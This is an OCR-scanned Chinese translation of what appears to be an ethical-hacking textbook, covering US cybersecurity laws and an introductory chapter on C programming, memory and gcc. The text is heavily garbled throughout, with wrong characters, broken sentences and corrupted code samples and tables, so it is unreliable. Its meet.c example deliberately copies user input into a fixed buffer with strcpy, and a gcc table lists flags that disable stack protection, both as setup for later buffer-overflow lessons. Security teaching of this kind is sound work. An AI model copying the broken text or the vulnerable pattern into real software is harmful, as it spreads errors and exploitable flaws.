法 访问 政府 、 金 融 机 构 和 其 他 计算 机 网 络 系统 等 违法 行为 给 出 了 相应 的 民事 和 刑事 
处 罚 规定 。 该 法 案 规定 司法 管辖 权 属于 美国 联邦 调查 局 和 特勤 局 。 


3. 18 USC 2510 和 2701 系列 电子 通信 隐私 法 


这 部 分 属于 电子 通信 隐私 法 (Electronic Communication Privacy Act，ECPA), H 
的 是 防止 未 经 授权 的 访问 和 通信 。ECPA 与 侧重 于 保护 计算 机 和 网 络 系统 的 CFAA 不 
同 。 大 多 数 人 者 没有 意识 到 ，ECPA 由 两 个 主要 部 分 组 成 : 修正 的 罚 听 法 案 和 存储 通 
信 法 案 ， 每 个 都 有 目 己 的 定义 、 规 定 和 案例 解释 。 和 食 听 法 案 保护 包括 有 线 、 语 音 及 
数据 在 内 的 所 有 通信 传输 ， 芥 止 未 经 授权 的 访问 和 信息 泄露 (特例 除外 )。 存 储 通 信 
法 案 保护 菏 种 形式 通信 前 后 的 通信 传输 及 电子 存储 。 这 听 上 去 简单 ， 但 这 种 划分 可 
反映 出 有 线 通 信和 存储 通信 在 风险 和 补救 措施 上 有 很 大 不 同 。 

虽然 ECPA 限 制 未 经 授权 的 访问 和 通信 ,但 它 也 意识 到 有 菜 些 类 型 的 未 经 授权 的 
访问 是 必要 的 。 例 如 ， 政 府 有 权 出 于 保护 用 户 的 隐私 权 的 目的 ， 获 取 电 话 通 信 、 互 
联网 通信 、 电 子 邮 件 和 网 络 流量 守信 息 。 


4. 数字 于 年 版 权 法 


数字 后 年 版 权 法 (Digital Millennium Copyright Act, DMCA) 通 常 不 在 黑客 和 信息 
安全 的 问题 范畴 进行 讨论 ， 但 它 与 信息 安全 相关 。DMCA 于 1998 年 通过 世界 知识 产 
权 组 织 (WIPO) 版 权 条 约 立 法 。WIPO 条 约 要 求 缔约 国 “ 提 供 充分 的 法 律 保 护 和 有 效 
的 法 律 补 救 措施 ， 葵 止 破坏 用 于 控制 获取 作品 渠道 或 者 重 制作 者 作品 的 科技 保护 撞 
施 ”。CFAA 保 护 计算 机 系统 ，ECPA 保 护 通 信 ， 而 DMCA 保 护 某 些 受 版 权 保 护 的 内 
容 本 里 倪 受 未 经 授权 访问 。DMCA 规 定 使 用 、 制 造 和 败 卖 规避 技术 手段 对 有 具有 版 权 
保护 的 作品 获取 控制 访问 权限 所 应 承担 的 民事 和 刑事 责任 。 

DMCA 规 定 ， 任 何人 都 不 应 试图 自 改 并 破坏 受 版 权 法 保护 的 访问 控制 项 。 

DMCA 人 允许 用 于 识别 加 密 技 术 缺 陷 和 安全 漏洞 的 “加 蜜 研究 ”"。 它 还 允许 进行 
安全 测试 (前 提 是 该 行为 不 侵犯 党 版 权 傈 护 的 作品 或 违反 CFAA 这 类 运用 的 法 律 ), 但 
不 涵 兰 其 他 安全 专家 可 能 从 事 的 其 他 更 广泛 领域 的 容 免 。 

5. 2002 年 的 网 络 安全 加 强 法 案 

2002 年 的 网 络 安全 加 强 法 案 (Cyber Security Enhancement Act of 2002，CSEA) 是 
美国 爱国 者 法 案 的 补充 法 案 。 访 法案 规 定 ， 实 施 东 种 计算 机 犯 徘 的 攻击 者 可 能 会 判 
处 终身 监禁 。 硅 对 他 人 造成 人 和 喘 伤 害 或 死亡 ， 或 对 公众 健康 或 安全 构成 威胁 ， 攻 击 
者 均 可 能 被 判处 终身 监禁 。CSEA 还 增强 了 美国 政府 监督 通信 的 能 力 和 权力 。 这 样 
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布 前 , 报告 可 疑 的 犯罪 行为 或 协助 执法 部 门 办 案 时 , 服务 提供 商 往 往 感 到 非常 棘手 ; 
行 在 未 告知 客户 或 未 经 客户 许可 的 情形 下 ， 或 在 某 些 特定 情形 下 ， 服 务 提 供 商 将 客 
户 信 息 提 供给 执法 人 员 ， 客 户 可 能 会 对 服务 提供 商 提起 诉讼 ， 控 告 其 未 经 许可 泄露 
个 人 隐私 。 现 在 ， 服 务 提 供 商 可 以 报告 可 疑 情况 并 在 客户 不 知情 的 情况 下 协助 执法 
部 门 办 案 。 美 国 爱国 者 法 案 的 这 项 和 其 他 相关 条 款 肯定 会 遭 到 许多 民权 人 士 的 反对 
和 抗议 。 
6. 2014 年 的 网 络 安全 加 强 法 


2014 年 的 网 络 安 全 加 强 法 (Cybersecurity Enhancement Act of 2014) 指 出 ， 美 国 国 
家 标准 与 技术 研究 院 QNational Institute of Standards and Technology, NIST) Ti AH 
协调 联邦 政府 ， 在 与 联邦 机 关 和 私企 利克 相关 方 商 谈 后 ， 开 发 一 系列 “日 愿 的 、 行 
业主 导 、 基 于 共识 ”的 网 络 安 全 标准 。 该 法 案 还 指出 ， 联 邦 、 州 和 本 地 政府 禁止 使 
用 私营 实体 共享 的 信息 来 制定 针对 相应 实体 监管 的 标准 。 

根据 2014 年 的 网 络 安全 加 强 法 ， 联 邦 机 天 和 部 门 必须 制定 网 络 安全 研究 和 发 展 
战略 计划 ， 该 战略 计划 每 四 年 更 新 一 次 。 该 战略 计划 以 协作 方式 开发 ， 以 免 行业 和 
学 本 利益 相 关 方 做 重复 工作 。 该 法案 还 涉及 教育 方面 ， 为 联邦 网 络 安全 工作 人 员 创 
建 “SFS 服 务 奖 学 金 ” 计 划 ; 在 征 得 公共 部 门 和 私人 部 门 利 益 相 关 方 同意 的 情况 下 ， 
由 NIST 人 负 贡 人 组 织 开 发 网 络 安 全 教育 和 意识 培训 计划 。NIST 负 贡 人 还 需要 制定 政 
TR. 使 政府 更 多 地 使 用 云 计 算 技术 , 来 文 持 云 计算 服务 增强 标准 化 和 提高 互 操作 性 。 


7. 2015 年 的 网 络 安全 信息 共 圣 法 


2015 年 的 网 络 安全 信息 共享 法 (Cybersecurity Information Sharing Act，CISA) 建 
六 了 一 个 框架 ， 人 允许 私营 实体 与 政府 部 门 之 间 秘 密 地 双 同 共享 网 络 威胁 信息 。 安 全 
港 保护 (safe harbor protection) 赋 予 私营 实体 不 共享 信息 的 权利 。 

CISA 还 授权 一 些 政府 和 私营 实体 监视 菜 些 系 统 ， 并 采取 网 络 安 全 防御 措施 。 私 
营 实体 有 权 不 监视 CISA 同 意 的 活动 。 

授权 私营 实体 使 用 防御 措施 来 保护 自己 的 信息 系统 和 其 他 已 同意 实体 的 信息 系 
统 ， 不 将 这 视 为 “黑客 ”活动 ;而 按照 CFAA， 这 些 通 常 是 非法 的 。 授 权 的 “防御 
措施 ”不 包括 销毁 或 严重 损坏 第 三 方 信息 系统 ， 不 允许 提供 非 授权 访问 ， 也 不 允许 
损害 第 三 方 信息 系统 。 


8. 美国 纽约 州 金融 服务 部 颁布 的 网 络 安全 法 案 


一 些 州 法 律 正 变 得 越 来 越 详 细 和 规范 ， 例 如 美国 纽约 州 金融 服务 部 INYDFS) 颁 
布 的 网 络 安 全 法 案 。 该 法 案 于 2017 年 初生 效 ， 要 求 位 于 纽约 的 金融 公司 实施 特定 的 
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安全 控制 措施 ,包括 配备 合格 的 首席 信息 安全 官 (CISO)， 完 成 渗透 测试 、 漏 洞 评估 、 
年 度 IT 风险 评估 等 。CISO 每 年 要 问 实 体 的 董事 会 呈报 书面 报告 ， 列 出 重大 网 络 安全 
风险 、 网 络 安全 计划 的 整体 有 效 性 ， 还 要 说 明 实 体 非 公开 信息 的 机 密 性 、 完 整 性 和 
安全 性 。 
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恶意 攻击 者 极 具 侵略 性 ， 并 拥有 雄厚 资金 ， 他们 使 用 最 前 沿 的 技术 ， 活 动 地 操 
遍及 人 全球， 而 且 在 不 断 完 善 攻 击 手段 。 恶 意 攻击 者 想 要 控制 我 们 的 医院 、 选 举 、 资 
金 和 知识 产权 。 为 了 应 对 这 些 来 势 泣 漳 的 恶 童 攻击 者 ， 唯 一 的 途径 是 组 建 一 文 局 系 
质 的 、 掌 握 防 御 技 能 的 专业 安全 团队 (道德 黑客 团队 )。 道 德 黑 客 在 黑暗 世界 与 坏人 
凯 舰 的 目标 之 间 设 置 缓冲 带 ， 道 德 黑 客 的 工作 是 先 于 恶意 攻击 者 找 出 安全 问题 ， 并 
在 坏人 可 利用 相应 问题 前 找 出 解决 方案 来 防止 恶意 攻击 。 

恶意 黑客 在 提高 攻击 技能 ， 作 为 道德 黑客 的 我 们 ， 就 要 更 加 勤 损 地 工作 来 阻击 
他 们 。 对 攻击 事件 提起 诉讼 是 一 件 极其 复 杀 的 事情 ， 圣 好 网 络 安 全 法 律 正在 不 断 完 
普 ， 使 我 们 有 据 可 依 ， 更 紧密 地 协作 ， 来 阻止 和 打击 网 络 犯 罪 。 物 联网 经 济 正在 兴 
起 ， 道 德 黑 客 必须 扩充 自己 的 技术 能 力 集 ， 集 中 精力 研究 最 新 的 攻击 技术 。 本 书 旨 
在 帮助 道德 黑客 了 解 软件 定义 的 无 线 电 (Software-Defined Radio, SDR). F-ft@4 
运 萌 、 勒 索 软 件 、 般 入 陈设 备 漏 洞 等 。 请 跟随 本 书 快 乐 地 学 习 吧 ! 
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第 2 章 编程 技能 


为 什么 要 学 习 编 程 ? 道德 黑客 者 应 该 尽 可 能 多 地 学 习 研 究 编程 知识 ， 这 样 才 能 
抢 在 不 道德 黑客 找到 程序 漏洞 之 前 友 现 并 修复 漏洞 。 许 多 安全 专家 从 非 传 统 的 角度 
参与 编程 ,在 进入 安全 生涯 之 前 如 党 没有 编程 经 验 。 俘 找 程序 缺陷 (Bug) 很 像 一 种 苋 
ae: 如 果 和 存在 漏洞 ， 谁 会 完 友 现 它 ? 本 章 引 在 介绍 必 备 的 编程 技能 ， 以 帮助 理解 后 
续 痢 站， 并 抢 在 黑 帽 黑客 之 前 及 现 软 件 中 的 漏洞 。 


本 章 将 讨论 如 下 主题 : 
C 编 程 语言 
计算 机 内 存 
Intel A 8 28 

汇编 语言 基础 
使 用 gdb 进 行 调试 
Python 编程 技能 


2.1 C 编 程 语言 


C 编 程 语言 是 AT&T 贝 尔 实验 室 的 Dennis Ritchie 于 1972 年 开发 的 。 该 语言 被 广泛 
用 于 UNIX 系 统 ， 几 乎 无 处 不 在 。 事 实 上 ， 大 部 分 音 用 网 络 程序 和 操作 系统 ， 以 及 
诸如 Microsoft Office fT. Adobe Reader 和 浏览 需 等 大 型 应 用 程序 , 都 是 综合 使 用 C、 
C++、Objective-C、 汇 编 语 言 以 及 其 他 低级 语言 编写 的 。 


2.1.1 Ci 语言 程序 的 基本 结构 

尽管 每 个 C 语 言 程序 都 不 相同 ， 但 大 多 数 程 序 中 都 存在 着 一 些 通用 结构 。 下 面 
将 讨论 这 些 结构 。 

1. main E 2X 

所 有 C 程 序 都 包含 一 个 main 函 数 ( 小 写 )， 其 格式 如 下 所 示 : 

«optional return value type» main(«optional argument») { 


«optional procedure statements or function calls»; 


} 
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其 中 ， 返 回 值 类 型 和 参数 部 十 可 选 的 。 如 果 未 指定 返回 值 类 型 ， 则 使 用 返回 类 
型 int。 但 一 些 编 译 瘟 可 能 抛 出 敬告 消 晨 ， 指 出 开 友 者 未 将 返回 值 指定 为 int， 或 坚 试 
使 用 void。 如 采 使 用 命令 行 参数 ， 那 么 可 使 用 以 下 格式 : 


«optional return value type» main(int argc, char * argv[]){ 


其 中 ， 整 型 值 arfgc 保 存 参数 个 数 ，argv 数 组 保存 形 参 ( 字 符 串 )。 程 序 名 总 是 存储 
在 偏 移 地 址 argv[0]。 上 面 格式 中 的 圆 括号 和 大 括号 是 强制 的 ， 但 这 些 元 系 之 间 的 空 
格 可 省 略 。 大 插 写 用 来 表示 一 段 代码 的 开始 和 结束 。 尽 害 过 程 和 哨 数 调用 是 可 选 的 ， 
但 如 果 没 有 过 程 和 函数 调用 ， 程 序 实际 上 将 不 会 执行 任何 功能 。 过 程 语 句 仪 是 一 系 
列 用 来 操作 数据 或 变量 的 命令 ， 通 弟 以 分 写 结束 。 


2. 函数 


函数 是 一 系列 自 包 含 代码 集合 ， 可 由 main 或 其 他 函数 调用 执行 。 它 们 是 非 持 久 
性 的 ， 根 据 需 要 可 以 多 次 调用 ， 从 而 防止 在 程序 中 编写 重复 代码 。 函 数 的 具体 格式 
如 下 : 


<optional return value type> function name («optional function 
argument>) { 


} 


PRECES] SS — 41 MZ ERAS 44 s WIIKEY LG AZ AIT Je BA 
返回 值 ， 以 及 将 在 函数 体 中 使 用 的 形 参 ， 这 样 可 得 知 在 处 理 时 是 否 需要 加 上 实 参 . 
鲜 数 调用 的 格式 如 下 : 


«optional variable to store the returned value =>function name 
(arguments if called for by the function signature); 


下 面 是 一 个 简单 示例 : 


#include <stdio.h> 

#include <stdlib.h> 

int main(void) { 

int val x; 

val x = foo(); 

printf("The value returned is: $d*Mn", val x); 
exit(0); 

} 

int foo(){ 

return 8; 


} 
程序 首先 添加 了 头 文 件 stdioh 和 stdlib.h， 头 文件 中 包含 exit 和 printf 的 函数 声明 。 
exit 函 数 是 在 stdlib.h 中 定义 的 ，printf 函 数 是 在 stdioh 中 定义 的 。 如 果 在 程序 中 使 用 动 
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态 链 接 函 数 ， 但 是 不 知道 震 要 湛 加 哪些 头 文 件 ， 可 以 但 看 手册 ,例如 man sscanf， 并 
参考 顶部 的 摘要 信息 。 接 着 程 序 定义 返回 值 为 int 的 main 函 数 。 在 小 括 写 之 间 的 参数 
位 置 指 定 void， 此 时 不 需要 给 main 函 数 传 递 实 参 。 然 后 创建 变量 x， 数 据 类 型 为 int。 
再 调用 图 数 foo， 并 将 返回 值 赋 给 xX。foo 图 数 只 返回 值 8。 上 此后， 使 用 printft 函 数 在 房 
幕 上 显示 foo 函 数 的 返回 值 8， 使 用 格式 字符 串 %d， 将 x 视 为 十 进 制 值 。 

限 数 调用 可 修改 程序 流 (Flow)。 调 用 函数 时 ， 程 序 的 执行 逻辑 暂时 跳 转 到 疯 数 
中 。 执 行 完 被 调 函 数 后 ， 会 返回 到 调用 指令 之 下 虚拟 内 存 位 置 的 主 调 函 数 。 在 第 11 
革 讨 论 栈 (Stack) 操 作 时 ， 将 更 能 体会 到 这 一 点 。 


3. 变量 


变量 用 于 在 程序 中 存储 可 能 发 生 更 改 且 可 动态 影响 程序 逻辑 的 信息 片段 。 表 2-1 
ith Y $5 DLE) — EAE ER ASA, 


表 2-1 ”变量 类 型 


变量 类 型 用 Ok 典型 大 小 
对 于 64 位 计算 机 为 8 字 节 

int 存储 诸如 314 或 -314 的 有 符号 整数 值 对 于 32 位 计算 机 为 4 字 节 
对 于 16 位 计算 机 为 2 字 节 

float 存储 诸如 -3.234 的 有 符号 浮 点 数 A. 

double 存储 较 大 的 浮 点 数 8 字 节 

char 人 存储 像 “d” 这 样 的 单个 字符 I 


程序 编译 后 ， 根 据 特定 系统 对 变量 类 型 长 度 的 定义 ， 大 多 数 变量 都 会 被 预 分 配 
固定 长 度 的 内 存 。 表 2-1 列 出 的 长 度 只 是 典型 值 ， 实 际 长 度 可 能 与 此 不 同 ， 具 体 是 由 
硬件 的 实现 来 决定 的 。 然 而 ，C 语 言 中 的 sizeof 函 数 可 用 于 获取 由 编译 器 分 配 的 确切 
内 存 长 度 。 

变量 通常 定义 在 代码 块 的 起 始 处 。 当 编译 器 遍历 代码 并 构建 符号 表 时 ， 它 必须 
首先 识别 某 个 变量 , 之 后 该 变量 才能 使 用 。 其 中 的 “符号 ”只 是 一 个 名 称 或 标识 符 。 
变量 的 形式 化 声明 如 下 所 示 : 


«variable type» «variable name» «optional initialization starting with 


nus 
例如 : 
int a = 0; 


-ExSS AE SH F4 Na. IH 7JOR SE T AE EE 8 S EA) 0 
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声明 变量 后 ， 残 可 通过 赋值 结构 来 改变 这 个 变量 的 值 。 例 如 ， 下 面 的 代码 行 
xxt? 


在 一 条 赋 信 语 铝 ， 它 包含 一 个 变量 x， 通 过 + 操作 符 对 其 值 进行 修改 之 后 ， 叉 将 
新 值 存 回 x 中 。 下 面 是 一 种 常见 的 语句 格式 : 


destination = source <with optional operators> 
其 中 destination 是 用 于 存储 最 终结 果 的 位 置 。 
4. printf 


C 语 言 自 带 了 许多 有 用 的 结构 (都 打包 在 libc 库 中 )。 最 第 用 的 一 种 结构 是 printf 命 
令 ， 它 迪 第 用 于 同 屏 幕 上 输出 结果 。printf 命 令 上 共有 两 种 格式 : 


- 


printf (<string>); 
printf (<format string>, <list of variables/values>); 


第 一 种 格式 非常 直接 ， 用 于 在 屏幕 上 显示 一 个 简单 字符 叫 ， 而 第 二 种 格式 则 代 
助 格式 化 符号 提供 了 更 大 的 灵活 性 ， 格 式 化 符号 由 常见 的 字符 和 充当 占 位 符 的 特殊 
符号 组 成 , 这 些 占 位 符 的 具体 值 由 逗号 后 面 的 变量 列表 提供 。 表 2-2 列 出 并 说 明了 党 
见 的 格式 化 从 号 。 
表 2-2 ”printf 格 式 化 符号 
BRES | ax 示例 

%n 什么 都 不 显示 printf("test ?on" <PTR>); 

ood printf("test %d", 123); 

%5 puntf("test %s", " 123"); 

%x 十 六 进 制 但 printf("test %x", 0x123); 
printf("test %f", 1.308): 


vof 


利用 这 些 格式 化 符号 ， 程序 员 可 使 用 printf 系 列 函 数 ， 指 示 如 何 将 数据 显示 在 屏 
右上 、 写 入 文件 中 或 执行 其 他 可 能 的 操作 和 等。 例如， 假设 有 一 个 float 类 型 的 变量 ， 
想 要 确保 得 出 为 该 闫 型， 并 限制 小 效 点 前 后 的 宽度 。 此 时 ， 可 使 用 以 下 代码 : 


root@kali:~# catfmt str.c 
finclude «stdio.h» 


int main(void) { 
double x = 23.5644; 
printf ("The value of x is %5.2f\n", x); 
printf ("The value of x is %4.1f\n", x); 
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Si: 


return 0; 
} 
root@kali:~# gcc fmt str.c -o fmt str 
root@kali:~# ./fmt str 
The value of x is 23.56 
The value of x is 23.60 


在 第 一 个 printf 调 用 中 ,总 宽度 为 5， 小 数 点 后 保留 两 位 。 在 第 二 个 printf 调 用 中 ， 
总 宽度 为 4， 小 数 点 后 保留 一 位 。 
EX "o SEB: 本 章 中 的 示例 使 用 32 位 Kali Linux。 如 果 使 用 64 位 Kali Linux, NE 
VL 要 更 改编 译 选项 . 


5. scanf 


scanf 命 令 的 功能 与 printf 正 好 相反 ，scanf 命 令 通 利用 于 获取 用 户 的 输入 ， 有 具体 的 
命令 格式 如 下 ; 


scanf(«format string», «list of variables/values»); 


Hh, format string 可 包含 与 表 2-2 中 所 示 的 printf 相 同 的 格式 化 符号 。 例 如 ， 下 
面 的 代码 将 从 用 户 处 读 取 一 个 整 型 输入 ， 并 将 该 值 存 入 名 为 mumber 的 变量 中 : 


scanf("$d", &number); 


实际 上 ， 人 符号 用 于 表示 将 值 存 入 number 所 指 代 的 内 存 地 址 ; 在 讨论 完 2.2.7 节 
“指针 ”后 ， 你 将 对 这 里 的 含义 了 解 得 更 清楚 。 目 前 只 要 知道 ， 在 使 用 scanf 时 必须 
在 变量 名 前 添加 && 符 号 即 可 。 scanf 命令 足够 智能 , 它 可 目 动 转换 变量 的 类 型 。 因此 ， 
假如 在 上 面 的 命令 中 输入 一 个 字符 ，scanf 会 自动 将 该 字符 转换 为 十 进 制 (ASCII 码 ) 
值 。 但 scanf 没 有 对 字符 串 长 度 进行 边界 检查 ， 因 此 可 能 导致 一 些 问题 (这 一 点 会 在 第 
11 章 进一步 说 明 )。 

6. strcpy/strncpy 

strcpy 命 令 可 能 是 C 语 言 中 最 危险 的 命令 了 ， 其 格式 如 下 : 

strcpy(«destination», «source»); 

这 个 命令 的 功能 是 : 将 源 字符 串 ( 一 个 以 空 字 符 \0 结 尾 的 字符 序列 ) 的 每 个 字符 复 
制 到 目标 字符 串 中 。 如 果 未 检 得 源 字符 串 长 度 就 进行 复制 ， 后 果 将 尤其 危险 。 实 际 
上 ， 这 里 正在 讨论 的 是 内 存 地 址 上 禾 癌 ， 稍 后 将 对 此 做 进一步 朱 述 。 一 旦 源 字 符 串 的 
长 度 超 过 为 目标 字符 串 分 配 的 空间 , Aou ACER ie, 影 啊 程 序 的 执行 。strncpy 
命令 相对 strcpy 而 言 更 安全 一 些 ， 其 格式 为 : 
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strncpy(«destination», «source», «width»); 


<width> 字 段 用 于 确保 仅 有 一 定数 目的 字符 会 从 源 字符 串 复 制 到 目标 字符 串 , 程 
序 员 倍 助 这 个 字段 可 获得 更 大 的 控制 权 。width 参数 应 当 基 于 目标 的 长 度 ( 如 分 配 的 
绥 冲 区 ) 而 定 。 男 一 个 函数 snprintf 可 控制 长 度 并 处 理 错误 。 总 体 而 言 ，C 编 程 语言 
对 字符 串 的 处 理 充 满 争 议 ， 需 要 开 及 人 员 处 理 内 存 分 配 ， 使 用 时 要 认真 检查 。 

7 ” 警告 : 使 用 像 strcpy 这 样 不 进行 边界 检查 的 函数 是 不 安全 的 。 然 而 ， 大 多 数 
D 。 编程 教程 并 没有 提 及 这 些 函 数 带 来 的 潜在 风险 。 事 实 上 ， 如 果 程序 员 只 使 
用 更 安全 的 替代 函数 (如 snprintD ,那么 缓冲 区 溢出 类 型 的 攻击 就 会 少 很 多 。 
显而易见 的 是 ， 目 前 缓冲 区 溢出 攻击 仍 是 最 常见 的 攻击 ， 因 此 可 以 推断 出 
FLFR IAT GLE BA RE Ee) Ba. SA ee Baie FRA 
A/S ILA. FI, KS RAIS FOR AARIFSA iA th 
救 (Exploit Mitigatiom) 保 护 措施 ， 有 助 于 阻止 针对 此 类 漏洞 发 动 的 攻击 。 此 
外 ， 即 便 使 用 了 具有 边界 检查 的 函数 ， 也 可 能 由 于 未 能 正确 地 计算 宽度 值 


qm 
we j | 
|! | 


而 党 到 攻击 。 
7. for 和 while 循环 
在 编程 语言 中 ， 循 环 用 于 多 次 重复 执行 一 系列 命令 。 利 见 的 两 种 类 型 是 : for 和 
While 循环 。 


for 循 环 从 一 个 起 始 值 开 始 计数 ， 不 断 计 算 测 试 值 是 否 满足 条 件 ， 执 行 循 环 内 的 
语句 ， 然 后 递增 循环 变量 的 值 ， 准 备 下 一 次 迭代 。 格 式 如 下 : 
for(«beginning value»; «test value»; «change Value>) { 


«statement»; 
} 
因此 ， 如 下 所 示 的 for 循 环 
for(120; 1<10; i++) { 
DErInEFIl wu. i)i 
} 
将 在 同一 行 (因为 没有 使 用 由 中 输出 0 到 9 这 10 个 数字 ， 即 0123456789。 
对 于 for 循 环 而 言 ， 每 次 在 执行 循环 体 中 的 语句 之 前 都 会 先 检 答 测试 值 是 否 满 足 
条 件 ， 因 此 ， 有 可 能 循环 体 一 次 也 不 会 执行 。 当 条 件 不 满足 时 ， 程 序 将 从 循环 络 
束 处 继续 回 后 执行 。 
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$B: 有 一 点 需要 注意 ， 小 于 号 (<) 和 小 于 或 等 于 号 (<=) 的 作用 是 不 同 的 ， 

后 者 会 使 循环 多 执行 一 次 ， 即 一 直 执 行 到 i=10。 这 一 点 非常 重要 ， 若 不 注 
意 ， 则 会 导致 循环 次 数 存 在 一 次 偏差 (Off-by-One) 错 误 。 此 外 注意 ,计数 是 
从 0 开始 的 。 这 一 点 在 C 语 言 中 非常 普遍 ， 需 要 习惯 它 。 


while 循 环 用 于 重复 执行 一 系列 语句 ， 直 到 满足 东 个 条 件 为 止 。 下 面 是 一 个 基本 
ZI: 


root@kali:~# cat while ex.c 
#include <stdio.h> 


int main(void) { 
THE 3v = D 


while (x«10) { 
Dprrntri"x = Fan", xj: 
Su P 

} 

return O; 


} 


root@kali:~# gcc while ex.c -0 while ex 
root@kali:~# while ex 
= 0 


Ww X 9X X X X X X 
| di 


A- ARARE, ADEN A AS ERE. 
8. if/else 


if/else 结 构 的 用 法 是 : 如 果 满 足 一 定 条 件 ， 则 执行 了 所 指示 的 一 系列 语句 ， 盏 则 
(可 选 地 ) 执 行 else 所 指示 的 一 系列 语句 。 如 果 没 有 else 语 句 块 ,程序 将 从 if 语 句 块 的 结 
束 大 括号 (}) 之 后 继续 往 下 执行 。 在 下 例 中 ，if/else 结 构 艇 人 套 在 while 人 循环 中 : 


root@kali:~# catifelse.c 
#include <stdio.h> 


int main(void) { 
ink x = 0; 
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whiīile(1){ 
1f {x — 0) f 
printf("x = $d\n", xi; 
XE: 
continue; 
} 
else { 
prinbEf("x 1— On") 
break; 
} 
return 0; 
} 
} 


root@kali:~# gcc ifelse.c -o ifelse 
root@kali:~# ./ifelse 

x = 0 

x l= 0 


在 这 个 示例 中 ， 使 用 while 循 环 来 遍历 ielse 语 句 。 变 量 x 在 进入 循环 前 设置 为 0。 
因为 x 守 于 0， 所 以 满足 站 语句 中 的 条 件 。 调用 printf 后 ， x 递增 1, 然后 是 continue 语 句 。 
在 循环 的 第 二 次 友 代 中 ， 这 如 句 中 的 条 件 未 满足 ， 因 此 移 到 else 语 句 处 。 调 用 printf 
函数 ， 然 后 使 用 break 跳 出 循环 。 当 只 有 一 条 语句 时 ， 可 以 省 略 大 括号 。 


9. 注释 

为 有 助 于 提升 源 代码 的 可 读 性 并 促进 共享 ,程序 员 通 常会 在 源 代 人 码 中 包含 注释 。 
有 两 种 注释 方法 : 使 用 /或 者 # 和 郑 。/ 表 明 本 行 中 该 符号 后 的 所 有 其 他 字符 在 程序 
执行 时 都 按 注 释 来 处 理 ， 不 会 作为 代码 被 执行 。 广 和 */ 这 对 符号 用 来 标识 多 行 注 释 。 
/* 表 示 注 释 的 开始 ，# 表 示 注 释 的 结束 。 
2.1.2 程序 示例 


下 面 来 看 第 一 个 完整 的 程序 。 首 和 驳 列 出 包含 /注释 的 程序 代码 ， 之 后 将 对 此 程 
序 进行 讨论 : 


// hello.c // customary comment of program name 
#include <stdio.h> // needed for screen printing 
main ( ) { // required main function 
printf ("Hello haxor"); // simply say hello 
} // exit program 


上 面 的 程序 非常 简单 ， 仅 使 用 stdio.h 库 中 的 printf 函 数 在 屏幕 上 输出 “Hello 
haxor ”而 已 。 
接 下 来 看 一 个 稍 复 邓 的 示例 : 
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// meet.c 
#include <stdio.h> // needed for screen printing 
#include <string.h> // needed for strcpy 
greeting (char *templ,char *temp2){ // greeting function to say hello 
char name[400]; // string variable to hold the name 
strcpy (name, temp2); // copy argument to name with the infamous strcpy 
printf("Hello $s $s\n", templ, name); // print out the greeting 
} 
main(int argc, char * argv[]){ // note the format for arguments 
greeting(argv[1], argv[2]); // call function, pass title & name 
printf ("Bye $s $s\n", argv[1], argv[2]); // say "bye" 
} // exit program 
上 面 的 程序 有 两 个 命令 行 参数 ,并 调用 greeting 函 数 打 印 出 Hello、 给 定 的 姓名 以 
及 回 车 符 。 当 greeting 函 数 结束 时 ， 控 制 流程 回 到 main 函 数 ， 由 它 打 印 出 Bye 以 及 给 
定 的 姓名 o 最 后 5 程序 退出 o 


2.1.3 ”使 用 gcc 进 行 编译 


编译 是 这 样 一 个 过 程 : 它 将 人 类 可 网 读 的 程序 源 代码 转换 为 计算 机 可 读 的 二 进 
制 文 件 ， 从 而 使 程序 可 以 被 计算 机 解析 并 执行 。 更 确切 地 说 ， 编 译 幽 会 将 源 代 但 作 
为 输入 ， 转 换 为 一 系列 称 为 目标 码 (Object Code) 的 中 间 文 件 。 这 些 目标 码 文件 可 能 
引用 了 一 些 源 代码 文件 中 未 包含 的 符号 和 函数 ， 因 此 ， 不 能 直接 执行 。 通 过 “链接 ” 
过 程 可 将 各 个 目标 码 文件 链接 成 一 个 可 执行 的 二 进 制 文件 ， 从 而 解决 这 些 符 号 和 函 
数 的 引用 问题 ， 当 然 ， 这 里 只 对 这 个 过 程 做 了 简单 描述 。 

在 UNIX 系 统 上 使 用 C 语 言 编 程 时 ， 我 们 选择 的 编 详 硕 是 GNU C Compiler(f8] f/f 
gcc)。gcc 提 供 了 大 量 的 编译 选项 ， 其 中 表 2-3 给 出 了 利用 的 标志 及 其 说 明 。 


表 2-3 ”常用 的 gcc 标 志 及 其 说 明 


wz IK ie A 
使 用 指定 的 文件 名 保存 编译 后 的 二 进 制 代码 。 默认 会 将 输出 保 
-0 <filename> 
存 为 a.out 
-S 生成 一 个 包含 汇编 指令 的 文件 ， 文 件 扩 展 名 为 .s 
-ggdb 生成 额外 的 调试 信息 ， 在 使 用 GNU 调 试 器 (gdb) 时 比较 有 用 
-C 编 详 但 不 进行 链接 。 生 成 一 个 市 有 .o 扩 展 名 的 目标 文件 


-mpreferred-stack-boundary-2 | 使 用 DWORD 长 度 的 栈 来 编 详 程序 ， 这 商 化 了 和 学习 时 的 调试 过 程 
禁用 栈 保 护 (gcc 4.1 引 入 )。 在 学 习 绥 冲 区 洲 出 时 (如 第 11 章 中 的 
内 容 )， 这 和 是 一 个 有 用 的 选项 
Ja FAY AT AR FESS Be DX Yat HT (BLS LEE), KE“ 
有 用 的 选项 


-fno-stack-protector 


-7 execstack 
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例如 ， 要 编译 程序 meet.c， 则 输 
$gcc -o meet meet.c 
然后 ， 要 执行 这 个 新 程序 ， 则 输入 : 


S./meet Mr Haxor 
Hello Mr Haxor 
Bye Mr Haxor 


S 


2.2 计算 机 内 存 


简 而 言 之 ， 计 算 机 内 存 是 一 种 具有 存储 和 获取 数据 能 力 的 电子 介质 。 存 储 的 最 
小 单位 是 1 位 ， 在 内 存 中 以 1 或 0 表示 。 我 们 称 4 位 为 一 个 “ 半 字 节 ”， 可 表示 0000 一 
- 1111 共 16 个 二 进 制 值 ， 用 十 进 制 表示 则 是 0 一 1$。 当 把 两 个 半 字 节 拼 在 一 起 ， 形 
成 一 个 8 位 的 二 进 制 数 时 ， 将 其 称 为 一 个 字 节 ， 可 表示 0 一 2$5( 即 2 -1) 的 十 进 制 数 。 
将 两 个 字 节 拼 在 一 起 时 ， 束 会 得 到 一 个 字 ， 可 表示 0~~65535( 即 2*-1) 的 十 进 制 数 。 
同 理 , 把 两 个 字 拼 在 一 起 , 就 会 得 到 一 个 双 字 DWORD), 可 表示 0 一 4 294 967 295( 即 
2? -1) 的 十 进 制 数 。 把 两 个 DWORD 拼 在 一 起 ， 就 会 得 到 一 个 QWORD， 可 表示 0~ 
